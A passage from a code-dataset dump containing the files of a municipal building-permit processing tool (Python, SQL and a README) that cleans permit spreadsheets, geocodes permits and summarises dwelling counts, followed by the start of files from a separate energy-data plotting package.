road=d[\"StreetName\"], geocode=row[1])\n # Execute the update statement\n self.cur.execute(update)\n # Check again for NULL geometries\n nulls = self.cur.execute(null_qry).fetchall()\n null_df = dslw.utils.Fetch(self.cur).as_dataframe()\n if len(null_df) > 0:\n aside.nix.fail()\n print(\"\\n{} geometries are NULL\".format(len(null_df)))\n print(null_df)\n print(\"\\nSee README about overriding values\")\n else:\n aside.nix.ok()\n\n def calc_density(self):\n # Density\n self.density_table = \"density{}\".format(self.year)\n aside.nix.write(\"Calculate 'density<year>' table\")\n with open(\"app/density.sql\", \"r\") as script:\n density_sql = script.read()\n density = density_sql.format(\n tbl=self.table_name, year=self.year, srid=SRID)\n self.cur.execute(density).fetchall()\n aside.nix.ok()\n\n def summarize(self):\n # Summarize\n aside.nix.write(\"Create 'summary' table\")\n with open(\"app/summarize.sql\", \"r\") as script:\n summarize_sql = script.read()\n summarize = summarize_sql.format(\n tbl=self.density_table, juris=self.juris)\n self.cur.execute(summarize).fetchall()\n aside.nix.ok()\n\n print(\"\")\n check_sum = (\"SELECT jurisdiction, tot_dwellings, sd, dup_units, md_units \"\n \"FROM summary\")\n df = dslw.utils.Fetch(self.cur.execute(check_sum)).as_dataframe()\n print(df)\n print(\"\")\n total = sum([df[\"sd\"].ix[0],\n df[\"dup_units\"].ix[0],\n df[\"md_units\"].ix[0]])\n if df[\"tot_dwellings\"].ix[0] != total:\n aside.nix.warn(\"Total does not match\")\n aside.status.custom(\"COMPLETE\", \"cyan\")\n\n def process_city(self):\n self.prepare_city()\n self.spatialize()\n self.calc_density()\n self.summarize()\n\n\ndef process_city(year):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n p = Processor(year)\n p.process_city()\n return\n\nif __name__ == 
\"__main__\":\n y = int(raw_input(\"What year of permit data? \"))\n process_city(y)\n"
},
{
"alpha_fraction": 0.7266602516174316,
"alphanum_fraction": 0.7420596480369568,
"avg_line_length": 42.33333206176758,
"blob_id": "2360c3beb628d7fbbb89bc0493e692e2c8cd7930",
"content_id": "83c3dfcb9255bb36f35bdeb8571ef87b4431ef56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1039,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 24,
"path": "/README.md",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "# bp2.py\n\nThis is the second attempt at making an automatic building permit processor.\n\n# Use (currently working)\n\n1. Download the permit data from [here](http://cpdbprod/ReportServer/Pages/ReportViewer.aspx?%2fLand%2fStatistics%2fNew+Construction+Report&rs:Command=Render) and save to `/data/<year>` as `city_<year>.xlsx` \n2. Open the command line in the bp2 directory \n3. Enter `python bp2.py get_data --replace` to update data from SDE (This takes ~30 min) \n4. Enter `python bp2.py process_city <year>` to process the downloaded Excel file \n5. Profit \n\n## Features to come\n\n* Output tables: `permits` (n features/parcel) and `new_units` (1 feature/parcel; allows for density) \n* Installation using `setup.py` \n* a `process_county` option \n* export to .json and .shp\n* a `report` option to generate reports using HTML templates and graphs \n\n# Rules\nBuilding permits must have >0 unit(s) \nBNCON is an \"other\" building type that may/may not include new units \nBAARC is a \"remodel\" building type that may/may not include new units"
},
{
"alpha_fraction": 0.6128133535385132,
"alphanum_fraction": 0.6142061352729797,
"avg_line_length": 22.933332443237305,
"blob_id": "32c1cef7651dbeaf659c40ddac66d2ae8fb2538a",
"content_id": "07185e668bb3ce1ea1264ac9eab57ddb3755e202",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 30,
"path": "/app/__init__.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport processing\n\n\ndef spatialize_script(conn, table, srid):\n \"\"\"Matches permits to geocodes using parcels/address data.\"\"\"\n _c = conn.cursor()\n _c.execute(open(\"app/spatialize.sql\", \"r\").read().format(\n table=table, srid=srid))\n _c.fetchall()\n #with open(\"app/spatialize.sql\", \"r\") as content:\n # script = content.read()\n #script = script.format(table=table, srid=srid)\n #_c.execute(script)\n return\n\n\n'''\nwith open(\"spatialize.sql\", \"r\") as ss:\n spatialize_script = ss.read()\n\nwith open(\"density.sql\", \"r\") as ds:\n density_script = ds.read()\n\nwith open(\"\", \"r\") as rs:\n region_summary_script = rs.read()\ndel ss, ds, rs\n'''\n"
},
{
"alpha_fraction": 0.6847188472747803,
"alphanum_fraction": 0.7023111581802368,
"avg_line_length": 27.702970504760742,
"blob_id": "dd01433d1551e50df3d4106e74ebc391bb57e1fe",
"content_id": "1a0046df1627a7a92da11641f36728ae3a36c4d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2899,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 101,
"path": "/app/region_summary.sql",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "/* Region Summary Report\nInputs:\n{0}: year\n{1}: aggregation feature\n{2}: aggregation feature's name field\n\nOutputs:\nCreates the region summary tables (_rs<year>) for the input year's single family, duplex, and multi\nfamily units by input aggregation field.\n*/\n\n/* Analysis for Mike -- Model Validation\n-- All Multidwelling Development by Nhood\nCREATE TABLE all_multidev (nhood_name TEXT, sum_dwellings INTEGER);\n-- Populate table\nINSERT INTO all_multidev\n SELECT name, sum(sum_dwellings) AS sum_dwellings FROM (\n\n -- Copy/paste this for individual projects\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2014 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n UNION \n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2015 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n UNION \n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2016 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n ORDER BY n.name\n) \n GROUP BY name;\n*/\n\n-- Recreated the anlaysis for Mike to be more useful/modular\nCREATE TABLE multi_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n-- Populate table\nINSERT INTO multi_rs{0}\n SELECT name, sum(sum_dwellings) AS sum_dwellings FROM (\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d \n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n\t)\n GROUP BY name;\n\n/* All multidev for a series of years\nSELECT nhood_name, SUM(sum_dwellings) FROM (\n SELECT * FROM multidev2014\n UNION\n SELECT * FROM multidev2015\n UNION\n SELECT * FROM multidev2016\n )\n GROUP BY nhood_name;\n*/\n\n-- Same thing, but for single family residences (sfr)\nCREATE TABLE sfr_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n\nINSERT INTO sfr_rs{0}\n SELECT name, SUM(sum_dwellings) AS sum_dwellings FROM (\n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d\n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings = 1 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n ) \n GROUP BY name;\n\n\n-- And for duplexes\nCREATE TABLE duplex_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n\nINSERT INTO duplex_rs{0}\n SELECT name, SUM(sum_dwellings) AS sum_dwellings FROM (\n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d \n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings = 2 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n ) \n GROUP BY name;\n"
},
{
"alpha_fraction": 0.5424301028251648,
"alphanum_fraction": 0.551591157913208,
"avg_line_length": 23.11627960205078,
"blob_id": "1bbc55e9481d616ee381cfe9029b1a34275caa7a",
"content_id": "b93d358bf336514312d47522f0dbba46bab5b50d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2074,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 86,
"path": "/app/summarize.sql",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "/*\nsummarize.sql -- Creates and enters building permit summary data into a new\ntable 'summary'.\n\nFormatting Parameters:\n{tbl}: table to summarize\n{juris}: jurisdiction of summarzing table\n*/\n\n-- Create summary table\nCREATE TABLE IF NOT EXISTS summary (\n jurisdiction TEXT PRIMARY KEY,\n tot_permits INT,\n tot_dwellings INT,\n sd INT,\n dup_units INT,\n dup_permits INT,\n md_units INT,\n md_permits INT\n);\n\n\n-- Insert City\nINSERT OR IGNORE INTO summary VALUES ('city', 0, 0, 0, 0, 0, 0, 0);\n\n\n-- Insert County\nINSERT OR IGNORE INTO summary VALUES ('county', 0, 0, 0, 0, 0, 0, 0);\n\n\n-- Update row by jurisdiction field in 'summary' table\nUPDATE \n summary \nSET \n -- Total Permits\n tot_permits = (\n SELECT COUNT(DISTINCT permit_number)\n FROM {tbl}),\n -- Total Dwellings\n tot_dwellings = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number)\n ),\n -- Sum Single Dwellings (SDs) \n sd = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number\n HAVING SUM(dwellings) = 1)\n ),\n -- Sum Duplexes\n dup_units = (\n SELECT SUM(dwellings) \n FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings = 2)\n ),\n -- Number of Dup permits\n dup_permits = (\n SELECT COUNT(permit_number)\n FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings = 2)),\n -- Sum Multidwellings\n md_units = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number\n HAVING SUM(dwellings) >= 3)\n ),\n -- Number of MD permits\n md_permits = (\n SELECT COUNT(permit_number) FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings >= 3))\nWHERE jurisdiction = LOWER('{juris}');\n"
},
{
"alpha_fraction": 0.5931598544120789,
"alphanum_fraction": 0.5985102653503418,
"avg_line_length": 33.66181945800781,
"blob_id": "24dd47103768a6beb3abb3bf9f4a1241852ff5a8",
"content_id": "55fc9355ad5bd193b6d4b0deb9bd8a275de63e58",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9532,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 275,
"path": "/app/processing.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport pandas as pd\n\n\n# =============================================================================\n# VARS\n\n# Output reports\n#CITY_OUT = \"data/city_permits/processed/city_res{}.csv\"\nOUTPUT_NAME = \"data/{year}/{name}_processed.csv\"\n# com_report = \"com{}.csv\"\n# pub_report = \"pub{}.csv\"\n\n# All construction permit codes\nres_codes = {\n 'BNMRA': \"New Multifamily 3-4 Units\",\n 'BNMRB': \"New Multifamily 5+ Units\", # Technically COM permit\n 'BNCON': \"New Other\", # Mixed use\n 'BNRDX': \"New Duplex\",\n 'BNSFR': \"New Single Family Residence\",\n 'BNSFT': \"New Single Family Townhouse\",\n 'BNROS': \"New Shelter/Dorm/Etc\",\n 'BAARC': \"Add/Alter/Remodel Commercial\",\n '': \"None specified\",\n 'None': \"None specified\"\n }\n\ncom_codes = {\n 'BNCON': \"New Other\", # Mixed use, see res_codes\n 'BNCOP': \"New Office/Bank/Professional Building\",\n 'BNCSC': \"New Store/Customer Service\",\n 'BNCSS': \"New Service Station/Repair Garage\",\n 'BNCID': \"New Industrial\",\n 'BNRHM': \"New Hotel/Motel/Cabin\",\n 'BO/S/C': \"Other Commercial\"\n }\n\npub_codes = {\n 'BNCCR': \"New Church/Religious Building\",\n 'BNCHI': \"New Hospital/Institution\",\n 'BNCPG': \"New Parking Garage\",\n 'BNCPW': \"New Public Works Facility\",\n 'BNCSE': \"New Education\",\n 'BNCSR': \"New Recreation\"\n }\n\n\n# =============================================================================\n# COUNTY VARIABLES\n\nCNTY_OUT = \"data/county_permits/processed/cnty_res{}.csv\"\n\nCITIES = [\"missoula\", \"bonner\"] # TODO: Lolo, French Town, Piltzville???\n\nUNITS = {\n \"sfr\": 1,\n \"sf\": 1,\n \"single\": 1,\n \"duplex\": 2,\n \"multi\": \"???\"\n }\n\nRENAMED_COLUMNS = {\n \"Permit Id\": \"permit_number\",\n \"Geo Code\": \"geocode\",\n \"Issued Date\": \"permit_issued_date\",\n \"Property Address\": \"address\",\n \"Type Of Work\": \"permit_type\",\n \"Description\": \"description\",\n \"Property City\": \"city\"\n }\n\nORDERED_COLUMNS = [\n \"permit_number\",\n \"geocode\",\n \"permit_issued_date\",\n \"address\",\n \"dwellings\",\n \"permit_type\",\n \"description\",\n \"city\"\n ]\n\n# NOTE: \"(?i)\" is the regular expression for case independant\nDESC_KEYWORDS = re.compile(\"(?i)\" + \"|\".join(k for k in UNITS.keys()))\n\nNA_VALUES = [\"na\", \"n/a\", \"NA\", \"N/A\", \"nan\"]\n\n\ndef calc_units(x):\n if re.findall(DESC_KEYWORDS, x):\n return UNITS[re.findall(DESC_KEYWORDS, x)[0].lower()]\n else:\n return 0\n\n\n# =============================================================================\n# PROCESSING FUNCTIONS\n\ndef city(all_permits):\n \"\"\"Cleans, preps, and exports building permit reports.\"\"\"\n # Open raw constuction-permit report as DataFrame 'all_const'\n in_name = os.path.basename(all_permits).split(\".\")[0]\n all_const = pd.read_excel(all_permits)\n\n # =========================================================================\n # CLEAN\n\n # Drop columns with all NULL values\n all_const.dropna(axis=1, how='all', inplace=True)\n\n # Rename cols from values in row 3: lowercase and replace spaces with \"_\"\n all_const.columns = all_const.ix[3].apply(\n lambda x: x.lower().replace(\" \", \"_\"))\n\n # Shorten 'dwellings' column name\n # NOTE: units are not always dwellings\n # (e.g. 
carport with 2 units means 2 cars)\n all_const.rename(columns={\"number_of_dwellings\": \"dwellings\"},\n inplace=True)\n\n # Rename index column 'ix'\n all_const.columns.name = 'ix'\n\n # Drop rows 0-3 which are just headings\n all_const.drop([0, 1, 2, 3], inplace=True)\n\n # Rename subtype column to permit_type\n all_const.rename(columns={\"subtype\": \"permit_type\"},\n inplace=True)\n # Remove Subtype field descriptions\n all_const['permit_type'].fillna(\"None\", inplace=True)\n all_const['permit_type'] = all_const['permit_type'].apply(\n lambda x: x.split(\" \")[0])\n\n # Dwellings\n # Convert NULL dwellings to 0\n all_const['dwellings'].fillna(0, inplace=True)\n # Convert Dwellings to integer\n all_const['dwellings'] = all_const['dwellings'].apply(lambda x: int(x))\n # Drop all rows with 0 dwelling units\n all_const = all_const[all_const.dwellings != 0]\n\n # Convert NULL addresses to \"\"\n all_const['address'].fillna(\"\", inplace=True)\n\n # Convert Geocode to text\n all_const['geocode'] = all_const['geocode'].apply(lambda x: str(x))\n\n # Add City column to improve geocoding results -- not used anymore\n all_const[\"city\"] = \"Missoula\"\n\n # Select all records that don't have 'MSTR' in the address\n all_const = all_const[~all_const.address.str.contains(\"MSTR\")]\n\n # Sort data\n all_const = all_const.sort_values(by=[\"permit_number\", \"address\", \"dwellings\"])\n\n # =========================================================================\n # GET PERMIT YEAR / ADD YEAR TO OUTPUT REPORT\n\n years = set()\n all_const[\"permit_issued_date\"].apply(lambda x: years.add(x.year))\n assert len(years) == 1, \\\n \"Input data shall only consist of one calendar year\"\n\n year = years.pop()\n\n # =========================================================================\n # GENERATE REPORTS\n\n # Create DataFrames for each group of building codes\n '''\n res_const = all_const[(all_const['subtype'].isin(res_codes.keys())) &\n (all_const['dwellings'] > 0)]\n '''\n # Residential Permit Query\n res_const = all_const[\n (all_const[\"permit_type\"].isin(res_codes.keys()))\n ].groupby([\"permit_number\", \"geocode\"]).first().reset_index()\n '''\n # Get permits with >= 3 units filed as commercial\n ((all_const[\"dwellings\"] >= 3) &\n (all_const[\"construction_type\"] == \"Commercial Construction\") &\n (all_const[\"permit_type\"].isin(res_codes.keys()))) |\n # Get residential construction of only listed subtypes and\n # dwellings >= 1\n ((all_const[\"permit_type\"].isin(res_codes.keys()) &\n all_const[\"dwellings\"] >= 1))\n # Finally, groupby permit number, remove duplicates and fix index col\n # ].groupby(\"permit_number\").first().reset_index()\n ].groupby([\"permit_number\", \"geocode\"]).first().reset_index()\n '''\n # TODO: maybe make reports for other construction types too?\n '''\n com_const = all_const[all_const['subtype'].isin(com_codes.keys())]\n pub_const = all_const[all_const['subtype'].isin(pub_codes.keys())]\n '''\n # Export\n #res_out = res_const.groupby('permit_number').first().reset_index()\n # res_out.to_excel(res_report, index=False)\n fname = OUTPUT_NAME.format(year=year, name=in_name)\n res_const.to_csv(fname, index=False)\n\n '''\n com_out = com_const.groupby('permit_number').first().reset_index()\n com_out.to_excel(com_report, index=False)\n\n pub_out = pub_const.groupby('permit_number').first().reset_index()\n pub_out.to_excel(pub_report, index=False)\n '''\n return fname\n\n\ndef county_permits(permits, out=True):\n \"\"\"Processes County building permits in the 
Odyssey-system format.\"\"\"\n # Only accept XLSX files\n if not permits.lower().endswith(\".xlsx\"):\n raise IOError(\"Input must be manually cleaned and converted to XLSX\")\n # Get year from filename\n year = re.findall(\"\\d+\", permits)[0]\n # Read the data\n df = pd.read_excel(permits)\n # Convert NA_VALUES to real NaN (technically a pandas subclass of float)\n df = df.applymap(lambda x: pd.np.nan if x in NA_VALUES else x)\n # Rename columns and drop those that aren't listed in the rename process\n df.rename(columns=RENAMED_COLUMNS, inplace=True)\n [df.drop(col, 1, inplace=True) for col in df.columns\n if col not in RENAMED_COLUMNS.values()]\n # and drop rows where all values are NaN\n df.dropna(how=\"all\", inplace=True)\n\n # Capitalize addresses\n df[\"address\"] = df[\"address\"].str.upper()\n # Convert description field to str\n df[\"description\"] = df[\"description\"].astype(str)\n # Clean geocodes (convert to str, and remove dashes (-))\n df[\"geocode\"] = df[\"geocode\"].astype(str)\n df[\"geocode\"] = df[\"geocode\"].apply(lambda x: x.replace(\"-\", \"\"))\n\n # Calculate dwellings\n df[\"dwellings\"] = df[\"description\"].apply(calc_units)\n\n # Query out New Construction, in nearby CITIES, that contain DESC_KEYWORDS\n res_const = df[(df[\"permit_type\"] == \"New Construction\") &\n (df[\"city\"].apply(lambda x: x.lower() in CITIES)) &\n (df[\"description\"].str.contains(DESC_KEYWORDS))].copy()\n\n # Standardize date column\n res_const[\"permit_issued_date\"] = pd.to_datetime(\n res_const[\"permit_issued_date\"], infer_datetime_format=True)\n # Order columns and sort by date\n res_const = res_const[ORDERED_COLUMNS].sort(\"permit_issued_date\")\n if out:\n res_const.to_csv(CNTY_OUT.format(year), index=False)\n return res_const\n\n\ndef combine_odyssey(permits1, permits2, output_intermediate=False):\n \"\"\"Used for the 2015 conversion to Odyssey permit system.\"\"\"\n # Process and combine the two 2015 permit sets\n df_one = county_permits(permits1, output_intermediate)\n df_two = county_permits(permits2, output_intermediate)\n full_df = df_one.append(df_two)\n # Standardize date column\n full_df[\"permit_issued_date\"] = pd.to_datetime(\n full_df[\"permit_issued_date\"], infer_datetime_format=True)\n # Order columns and sort by date\n full_df = full_df[ORDERED_COLUMNS].sort(\"permit_issued_date\")\n full_df.to_csv(CNTY_OUT.format(\"2015\"), index=False)\n return\n"
},
{
"alpha_fraction": 0.6007073521614075,
"alphanum_fraction": 0.6062918901443481,
"avg_line_length": 28.844444274902344,
"blob_id": "2148478cd486c78a990384aff984d75112f9b619",
"content_id": "e9bc2c8c77edbef9b9a883b8d6255b8412e0d80d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5372,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 180,
"path": "/bp2.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\npermits.py -- Building Permit Database Script\nAuthor: Garin Wally; April-July 2016\n\n--NEW--\n\"\"\"\n\nimport os\nfrom glob import glob\n\n\nimport defopt\n\nimport aside\nimport dslw\nimport dslw.arcio\n\nimport app\n\n\n# =============================================================================\n# DATA PATHS\n\nparcels = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.Parcels\"\ncondos = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.All_Condos\"\nannex = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.Annexations\"\nnhoods = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.NH_Council_Boundaries\"\nufda = r\"I:\\ArcExplorer\\Data\\Planning_to_sde.gdb\\Mt_St_Plane\\UFDA_regions\"\naddrs = r\"I:\\ArcExplorer\\Data\\Structures\\Address.gdb\\AddrsFt\"\n\n\n# =============================================================================\n# DATA (No touching)\n\n# Path to database for storing copies from SDE, etc.\nSDE_DATA = \"data/sde_data.sqlite\"\n\n# Global srid to reproject to; QGIS-friendly\nSRID = 2256\ndata = [\n {\"path\": parcels, \"name\": \"parcels\"},\n {\"path\": condos, \"name\": \"condos\"}, # TODO: dissolve?\n {\"path\": annex, \"name\": \"annexations\"},\n {\"path\": nhoods, \"name\": \"nhoods\"},\n {\"path\": ufda, \"name\": \"ufda_regions\"},\n {\"path\": addrs, \"name\": \"addrs\"}\n ]\n# Names correlate with table names in .sql scripts\n\n'''\[email protected]_process\ndef check_null_geometry(null_geom):\n \"\"\"Msg:\n Check for Null Geometries\n \"\"\"\n if null_geom:\n raise AttributeError(\"Null geometries found\")\n'''\n\n\ndef update_base():\n \"\"\"Updates the sde_data.sqlite database from various data.\n\n ::\n\n $python permits2.py update_base --replace True\n None\n\n Keyword Arguments:\n replace (bool): option to delete and recreate the existing db.\n \"\"\"\n #if replace:\n aside.nix.write(\"Replacing database...\")\n os.remove(SDE_DATA)\n aside.nix.ok()\n conn = dslw.SpatialDB(SDE_DATA, verbose=False)\n print(\"Getting data...\")\n print(\"This will take a long time!\")\n for fc in data:\n if fc[\"name\"] not in conn.get_tables():\n aside.nix.write(fc[\"name\"])\n dslw.arcio.arc2lite(conn, fc[\"path\"], fc[\"name\"], t_srid=SRID)\n aside.nix.ok()\n conn.close()\n print(\"Done\")\n return\n\n\ndef process_city(year):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n # Set base directory\n base_dir = \"data/{year}\".format(year=year)\n # Get report file path\n city_rpts = [os.path.abspath(f).replace(\"\\\\\", \"/\") for f in\n glob(\"{base}/city_{year}.xlsx\".format(\n base=base_dir, year=year))]\n #rpt_name = os.path.basename(city_rpts[0]).split(\".\")[0]\n # Process; returns output path\n aside.nix.write(\"Process XLSX\")\n out_csv = app.processing.city(city_rpts[0])\n aside.nix.ok()\n # Get name (e.g. 
'city_2016_processed')\n table_name = os.path.basename(out_csv).split(\".\")[0]\n aside.nix.info(\"Table: \" + table_name)\n # Set db path\n db = os.path.join(base_dir, \"bp{year}.sqlite\".format(year=year))\n # Create db\n aside.nix.write(\"Create db\")\n conn = dslw.SpatialDB(db, verbose=False)\n cur = conn.cursor()\n aside.nix.ok()\n # Load csv to db\n aside.nix.write(\"Insert CSV\")\n dslw.csv2lite(conn, out_csv)\n aside.nix.ok()\n # Add notes column\n aside.nix.write(\"Spatialize permits\")\n cur.execute(\"ALTER TABLE {} ADD COLUMN notes TEXT\".format(table_name))\n # Backup\n cur.execute(\"SELECT CloneTable('main', '{0}', '{0}_bk', 1)\".format(\n table_name))\n # Attach spatial db\n cur.execute(\"ATTACH DATABASE '{}' AS sde_data;\".format(\n SDE_DATA))\n # Spatialize\n app.spatialize_script(conn, table_name, SRID)\n cur.execute(\"SELECT address FROM {0} WHERE geometry IS NULL\".format(\n table_name))\n null_geom_df = dslw.utils.Fetch(cur).as_dataframe()\n aside.nix.ok()\n if len(null_geom_df) > 0:\n print(\"\")\n aside.nix.warn(\"Null Geometries Found!\")\n print(null_geom_df)\n print(\"\")\n #check_null_geometry(null_geom)\n\n # Density\n aside.nix.write(\"Calculate 'density<year>' table\")\n with open(\"app/density.sql\", \"r\") as script:\n density_sql = script.read()\n density = density_sql.format(tbl=table_name, year=year, srid=SRID)\n cur.execute(density).fetchall()\n aside.nix.ok()\n\n # Summarize\n aside.nix.write(\"Create 'summary' table\")\n with open(\"app/summarize.sql\", \"r\") as script:\n summarize_sql = script.read()\n summarize = summarize_sql.format(tbl=table_name, juris=\"City\")\n cur.execute(summarize).fetchall()\n aside.nix.ok()\n\n print(\"\")\n check_sum = (\"SELECT jurisdiction, tot_dwellings, sd, dup_units, md_units \"\n \"FROM summary\")\n df = dslw.utils.Fetch(cur.execute(check_sum)).as_dataframe()\n print(df)\n print(\"\")\n total = sum([df[\"sd\"].ix[0], df[\"dup_units\"].ix[0], df[\"md_units\"].ix[0]])\n if df[\"tot_dwellings\"].ix[0] != total:\n aside.nix.warn(\"Total does not match\")\n aside.status.custom(\"COMPLETE\", \"cyan\")\n return\n\n\ndef export_shp():\n pass\n\n\nif __name__ == \"__main__\":\n defopt.run(update_base, process_city)\n"
}
] | 7 |
mnegus01/enviro
|
https://github.com/mnegus01/enviro
|
47a3731ae66cd87ef7146bf87029fe047fbd3dbb
|
04ee829213409d1ff427ffb964588ad19e6feeea
|
55b8f0fc481a19f540979635b5f914d2d2e01e23
|
refs/heads/master
| 2020-12-02T19:21:21.736267 | 2019-04-08T06:12:55 | 2019-04-08T06:12:55 | 96,327,758 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7199124693870544,
"alphanum_fraction": 0.7231947779655457,
"avg_line_length": 30.517240524291992,
"blob_id": "89ba783654e595d789e425ff5ab04fe17d51f73f",
"content_id": "4d2bcfd363899ae02967ee9cae5480aa554d8444",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 29,
"path": "/tests/conftest.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport pyleiades\nfrom pyleiades.utils.load_data import load_dataset\n\nTEST_DATA_DIR = 'tests/test_data'\nTEST_ARCHIVE_DIR = f'{TEST_DATA_DIR}/test_archive'\n\[email protected](scope=\"session\")\ndef monkeysession():\n # This is required to use monkeypatch in the `module` scope\n #\n # NOTE: It relies on pytest's internal API and so therefore it may not be\n # supported in future releases\n #\n # See https://github.com/pytest-dev/pytest/issues/363 for more info\n from _pytest.monkeypatch import MonkeyPatch\n mpatch = MonkeyPatch()\n yield mpatch\n mpatch.undo()\n\[email protected](scope=\"session\")\ndef testdata(monkeysession):\n monkeysession.setattr(pyleiades, 'DATA_DIR', TEST_DATA_DIR)\n monkeysession.setattr(pyleiades, 'ARCHIVE_DIR', TEST_ARCHIVE_DIR)\n return load_dataset()\n\[email protected](scope=\"module\")\ndef testvals(testdata):\n return testdata.value.values\n"
},
{
"alpha_fraction": 0.6341829299926758,
"alphanum_fraction": 0.6746626496315002,
"avg_line_length": 29.31818199157715,
"blob_id": "bc3c9f6c7701c26ddc3161fd6cb861d280b1ab47",
"content_id": "fd3d54bf935c222a7ede5cdbf5ae54cf846d6c98",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 667,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 22,
"path": "/scripts/pyleiades-demo.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport pyleiades as eia\nimport os\nfrom matplotlib import pyplot as plt\n\n# Create a visual\nvisual = eia.Visual(['coal', 'nuclear'])\nvisual.include_energy('renewable')\n\n# Demo single visual\nvisual.linegraph(freq='yearly', start_date='1970')\nfig_path = os.path.join(os.path.dirname(eia.__file__), 'fig', 'demo-plot.png')\nplt.savefig(fig_path, dpi=300)\nplt.close()\n\n# Demo double visual\nfig, axs = plt.subplots(2, 1, figsize=(8, 6))\naxs[0] = visual.linegraph(ax=axs[0], freq='yearly', start_date='1970')\naxs[1] = visual.linegraph(ax=axs[1], freq='monthly',\n start_date='1980', end_date='2000')\nplt.tight_layout()\nplt.show()\n"
},
{
"alpha_fraction": 0.5836530923843384,
"alphanum_fraction": 0.5859555006027222,
"avg_line_length": 38.48484802246094,
"blob_id": "906150f484a1c6fa9dbff7df79bce60246957df5",
"content_id": "38a15b82087da1e62c53393914fb3f2012ebe731",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5292,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 132,
"path": "/pyleiades/visuals.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
